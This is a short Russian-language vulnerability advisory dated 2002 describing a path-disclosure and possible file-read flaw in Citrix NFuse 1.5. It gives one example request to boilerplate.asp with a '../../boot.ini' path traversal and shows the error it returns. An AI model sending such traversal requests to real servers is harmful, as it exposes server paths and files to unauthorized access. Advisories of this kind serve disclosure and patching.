Раскрытие информации в Citrix Nfuse

Дата публикации:
01.04.2002
Всего просмотров:
859
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Citrix Nfuse - портальный сервер, обеспечивающий функциональные возможности любого приложения на сервере через web-браузер. Nfuse работает вместе с предварительно-установленным web сервером.

Передача специально обработанного запроса через boilerplate.asp, заставит хост возвратить сообщение об ошибке, содержащее путь к WWW корню. Возможно также уязвимость позволяет раскрытие произвольных файлов вне WWWROOT.
Запрос типа:
http://10.x.x.x/boilerplate.asp?NFuse_Template=../../boot.ini&NFuse_CurrentFolder=/SSLx0020Directories
выдаст ошибку:
There was an error:The Citrix HTML template specified does not exist or
could not be accessed. The template file specified was:
c:\inetpub\wwwroot\../../boot.ini
Уязвимость найдена в Citrix Nfuse 1.5


Ссылки: Источник
или введите имя

CAPTCHA